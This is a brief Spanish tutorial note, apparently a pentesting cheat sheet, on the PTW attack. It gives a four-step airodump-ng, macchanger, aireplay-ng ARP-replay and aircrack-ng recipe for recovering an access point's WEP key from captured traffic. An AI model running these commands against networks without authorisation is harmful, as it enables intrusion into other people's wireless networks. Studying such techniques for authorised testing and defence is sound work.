PTW Attack
Ataque usado para la obtención de contraseña. Mejora del ataque FMS ya que requiere menos IVs capturados para descifrar la contraseña del AP.
Capturar tráfico con Airodump-ng por mucho tiempo
sudo airodump-ng --write traffic_file --bssid <MAC_AP> --channel <channel_AP> <wifi_interface>
En paralelo, ejecutar MACchanger para conocer la dirección MAC de la interfaz de red utilizada
macchanger --show <wifi_interface>
Ejecutar ataque arpreplay con Aireplay-ng
sudo aireplay-ng --arpreplay –b <MAC_AP> -h <MAC_wifi_interface> <wifi_interface>
Crackear contraseña con Aircrack-ng por ataque PTW desde fichero con tráfico capturado en Airodump-ng
sudo aircrack-ng -z –b <MAC_AP> traffic_file.cap